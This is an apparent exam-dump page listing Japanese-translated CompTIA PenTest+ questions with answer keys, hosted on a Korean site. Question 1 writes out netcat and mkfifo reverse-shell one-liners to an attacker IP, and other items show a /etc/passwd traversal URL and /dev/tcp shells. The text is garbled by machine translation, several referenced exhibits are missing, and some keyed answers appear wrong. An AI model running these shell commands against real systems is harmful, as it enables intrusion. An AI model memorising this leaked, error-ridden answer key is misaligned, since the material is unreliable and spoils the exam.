최신 PT0-001日本語 무료덤프 - CompTIA PenTest+ Certification Exam (PT0-001日本語版)

문제1

Webアプリケーションの評価中に、侵入テスト担当者は任意のコマンドがサーバー上で実行される可能性があることを発見しました。この攻撃をさらに一歩進めたいと思い、侵入テスターは、192.168.1.5で攻撃側のマシンにリバースシェルを戻す方法を模索し始めます。可能な方法は次のうちどれですか？（2つ選択）

A. rm / tmp / f; mkfifo / tmp / f;猫/ tmp / f | / bin / sh -I 2>＆1 | nc 192.168.1.5 44444> / tmp / f

B. nc -e / bin / sh 192.168.1.5 4444

C. rm / tmp / f; mkfifo / tmp / f;猫/ tmp / f | / bin / sh -I 2>＆1 | nc 192.168.5.1 44444> / tmp / f

D. nc -nlvp 4444 -e / bin / sh

E. nc 192.168.1.5 44444

F. rm / tmp / f; mkfifo / tmp / f;猫/ tmp / f | / bin / sh -I 2>＆1 | nc 192.168.1.5 444444> / tmp / f

정답: B,C

문제2

次のうちどれがターゲットの外部ドメインで受動的偵察を実行するための最善でしょうか？

A. Peach

B. OpenVAS

C. Shodan

D. CeWL

정답: C

문제3

組織がポートの脆弱性を修正した後、侵入テスターが検証スキャンを実行しています
443ペネトレーションテスターは次の出力を監視します。

次のうち、最も発生した可能性が高いのはどれですか？

A. 不一致のファイアウォールルールが443をブロックしています。

B. IPSがポート443へのトラフィックをブロックしています

C. 組織はサービスをポート8443に移動しました

D. スキャン結果は誤検知でした。

정답: C

문제4

ペネトレーションテスト中に、テスターは悪用されたサーバーで実行されている従来のアンチウイルスを識別します。次の手法のうち、エクスプロイト後のフェーズでの永続性を最も確実にするのはどれですか？

A. バックドアされたexecutaWes

B. 変更されたデーモン

C. 新規ユーザーの作成

D. C \ windowsttempに配置されたシェルバイナリ

정답: B

문제5

ペネトレーションテスタは、Webアプリケーションの脆弱性スキャンレポートをクライアントに配信します。侵入テスターは、脆弱性を中程度の深刻度と評価しています。同じ脆弱性が以前のレポートで重大な重大度の発見として報告されました。次のうちどれが深刻度の低下の最も可能性の高い理由ですか？

A. The threat landscape has significantly changed.

B. The client has updated their codebase with new features.

C. The client has applied a hot fix without updating the version.

D. Thera are currently no known exploits for this vulnerability.

정답: C

문제6

侵入テスト担当者は、テキストボックスにSQLインジェクションコマンドを入力して、データベース上のインフォメーションストアにアクセスすることができました。次のうちどれが脆弱性を緩和するための最良の推奨ですか？

A. ログインに使用された資格情報をランダム化する

B. システム強化を実行

C. 入力正規化を実装する

D. ホストベースの侵入検知をインストールする

정답: C

문제7

侵入テストの範囲では、ポートスキャンを実行するときにテスターがステルスである必要があります。Nmap BESTの次のコマンドのうち、ステルススキャンをサポートしているのはどれですか？

A. -max-length

B. -host-timeout

C. -max-rate

D. -min-rate

정답: B

설명: (DumpTOP 회원만 볼 수 있음)

문제8

Webアプリケーションの静的コード分析レポートを利用して、以下を特定できます。

A. セッション固定の問題。

B. クライアント側のデータストレージ。

C. クリックジャッキング。

D. 入力のサニタイズが不十分です。

E. ビジネスロジックの欠陥。

정답: C

문제9

侵入テスト担当者は、WebアプリケーションのX-Frame-Optjonsヘッダーが設定されていないことに気付きました。次のうちどれが悪意のある行為者がこの構成設定を悪用するのですか？

A. パス変更を使ってアプリケーションのフレームワークを回避します。

B. JavaScriptを含む悪意のあるiframeを注入します。

C. アプリケーションをオーバーレイするフレームを作成します。

D. 悪意のあるiframe属性を渡します。

정답: B

문제10

以下の各パスワードを、表示される文字セットに基づいて、最も複雑度の低い（1）から最も複雑な（4）の順に並べます。各パスワードは1回しか使用できません。

정답:

문제11

ペネトレーションテスターは、ブラウザのURLに次の情報を入力しました。
https://www.example.com/login.php?file=../../../../../../../etc/passwd
サーバーは、サーバーの機密データファイルに含まれているデータで応答しました。次のタイプの脆弱性のうち、最も悪用される可能性が高いのはどれですか？

A. ディレクトリトラバーサル

B. 競合状態

C. コマンドインジェクション

D. 弱い資格情報

정답: A

문제12

ペネトレーションテスターは、マシン上で以下を実行します。

次のうちどれが返されますか？

A. 6

B. 1

C. 3

D. 5

정답: C

문제13

ペネトレーションテスターは、Webサービスを評価する必要があります。スコーピングフェーズ中にテスターが要求する必要があるのは次のうちどれですか？

A. 営業時間外の連絡先エスカレーション

B. SOAPプロジェクトファイル

C. XSD

D. WSDLファイル

정답: D

문제14

脆弱性スキャンは、MTTPSおよびHTTPプロトコルを介した接続を受け入れる銀行アプリケーションをホストしているドメインに対して実行されます。次の結果が得られます。
* SSU3がサポートされています
* HSTSは実施されていません
*アプリケーションは弱い暗号を使用します
*クリックジャッキングに対して脆弱
次のうちどれが最も高いリスクでランク付けされるべきですか？

A. HSTSは実施されていません

B. アプリケーションは週のophersを使用します

C. クリックジャッキングに対して脆弱

D. SSLv3がサポートされています

정답: A

문제15

ペネトレーションテスターは、組織の認証サーバーの脆弱性を悪用することに成功し、リバースシェルを設定したいと考えています。ペネトレーションテスターは、Netcatがターゲットで利用できないことを検出します。
次のアプローチのうち、NEXTを試行するのに適したオプションはどれですか？

A. xtermを実行して、ターゲットのXサーバーに接続します。

B. 対話型シェルを取得するために特権を昇格させようとします。

C. / etc / shadowの読み取りを試みます。

D. / dev / tcpソケットを使用してみてください。

정답: D

문제16

次のBESTのうち、レインボーテーブル攻撃から保護するのはどれですか？
D18912E1457D5D1DDCBD40AB3BF70D5D

A. 対称暗号化

B. 強化されたOS構成

C. パスワードの複雑さが増す

D. 暗号塩漬け

정답: C

문제17

コンサルタントがネットワーク上のWindowsオペレーティングシステムのバージョンを特定しているコンサルタントが実行する必要があるNmapコマンドは次のうちどれですか。

A. nmap -T4 -v -script smb-system-info 192.163.1.0/24

B. nmap -T4 -v -6 -iL /tmp/liat.txt -Pn -script smb-os-discovery -p 135-139

C. nmap -T4 -v -iL /tmp/list .txt -Pn -script smb-os-disccvery

D. nmap -T4 -v -sU -iL /tmp/list.txt -Pn -script smb-system-info

정답: C

문제18

ログを確認しているときに、Web開発者はフィールドに次のユーザー入力文字列があることに気付きます。

次のタイプの攻撃のうち、Webサイトに対して行われたものはどれですか？

A. 反映されたXSS

B. 永続的なXSS

C. XSSインジェクション

D. ブラインドXSS

정답: C

최신 PT0-001日本語 무료덤프 - CompTIA PenTest+ Certification Exam (PT0-001日本語版)

우리와 연락하기

유용한 링크

최신 업데이트